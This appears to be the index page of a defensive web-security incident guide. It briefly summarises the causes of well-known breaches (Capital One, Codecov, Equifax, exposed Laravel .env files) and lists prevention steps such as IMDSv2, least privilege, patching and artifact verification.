Incident Field Guide
Real web breaches broken down into cause, impact, first response, and prevention — so the same mistake doesn't happen twice.
AI-written code leaked an API key and ran up fraudulent charges — the real cause was an unpatched CVSS 10.0
The bill spike was a symptom. The real cause was an unpatched, public CVSS 10.0 RCE. An anonymized case, distilled into defensive lessons.
Capital One breach (2019) — how SSRF leaked 100M+ records, and how to defend
A single SSRF reached the metadata endpoint → over-privileged IAM temporary credentials → bulk S3 copy, leaking ~106M records. Every hop could have stopped it. In your environment: IMDSv2, IAM least privilege, and an allowlist for outbound fetches.
Codecov breach (2021) — when a 'trusted tool' in CI was hijacked and secrets leaked
A trusted CI tool (the curl|bash Bash Uploader) was altered upstream. Because your own code was untouched, it went unnoticed for ~2 months while CI secrets leaked; a checksum check caught it. In your CI: verify fetched artifacts, least-privilege secrets, rotation, egress monitoring.
Equifax breach (2017) — how an unpatched Apache Struts flaw leaked 147M people
The cause was a known, already-patched CVE (CVSS 10.0) left unapplied on a public system. An expired monitoring certificate hid the exfiltration for 76 days. In your environment: asset inventory, a patch SLA, machine monitoring, and healthy detection.
Laravel apps' .env was readable by the whole world — the most common shared-hosting mistake
The cause: the whole app sat under the web root; only public/ should be visible. Fix in three steps — .htaccess first aid, rotate keys, restructure — then prevent it with process.